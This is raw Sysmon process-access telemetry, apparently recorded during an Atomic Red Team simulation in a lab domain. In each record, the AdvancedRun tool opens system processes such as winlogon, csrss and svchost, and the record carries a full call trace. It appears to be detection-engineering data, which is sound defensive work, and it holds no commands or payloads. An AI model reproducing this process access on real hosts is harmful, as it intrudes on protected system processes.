17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983217Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983216Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983215Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983214Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983213Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983212Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983211Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983210Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983209Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003983208Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983207Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983205Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983204Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983203Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983202Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983201Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
